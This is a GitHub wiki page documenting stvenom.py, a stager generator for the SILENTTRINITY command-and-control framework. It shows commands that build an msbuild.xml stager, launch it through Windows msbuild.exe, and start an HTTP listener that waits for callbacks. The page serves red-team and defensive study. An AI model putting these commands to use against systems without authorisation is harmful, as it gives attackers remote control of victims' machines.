ST Venom - Th3J0kr/SILENTTRINITY_WIKI GitHub Wiki

Using ST Venom

Generate a stager for SILENTTRINITY using stvenom.py is piece of cake.

$ python3.7 stvenom.py --help  
usage: stvenom.py [-h] [--ip IP] [--file FILE] stager listener port

positional arguments:
  stager       Stager method
  listener     Listener protocol
  port         Bind Port

optional arguments:
  -h, --help   show this help message and exit
  --ip IP      Bind IP address
  --file FILE  Filename

Example:

$ python3.7 stvenom.py msbuild http 8089 --ip $(ip -4 addr show wlp2s0 | grep -oP '(?<=inet\s)\d+(\.\d+){3}')
[+] Generated stager to msbuild.xml
[*] Launch with 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe msbuild.xml'
[+] Generated resource file: msbuild.res
[*] Launch with 'python3.7 st.py -r msbuild.res'

Launch the stager using the generated resource file:

$ python3.7 st.py -r msbuild.res


   _____ ______    _______   __________________  _____   ______________  __
  / ___//  _/ /   / ____/ | / /_  __/_  __/ __ \/  _/ | / /  _/_  __/\ \/ /
  \__ \ / // /   / __/ /  |/ / / /   / / / /_/ // //  |/ // /  / /    \  /
 ___/ // // /___/ /___/ /|  / / /   / / / _, _// // /|  // /  / /     / /
/____/___/_____/_____/_/ |_/ /_/   /_/ /_/ |_/___/_/ |_/___/ /_/     /_/

                         Codename: Ánima
                         Version: 0.0.1dev

ST ≫ listeners
ST (listeners) ≫ use http
ST (listeners)(http) ≫ set BindIP 192.168.1.187
ST (listeners)(http) ≫ set Port 8089
ST (listeners)(http) ≫ start                                                                                                       [+] Listener 'http' started successfully!
ST (listeners)(http) ≫ Running on https://192.168.1.187:8089 (CTRL + C to quit)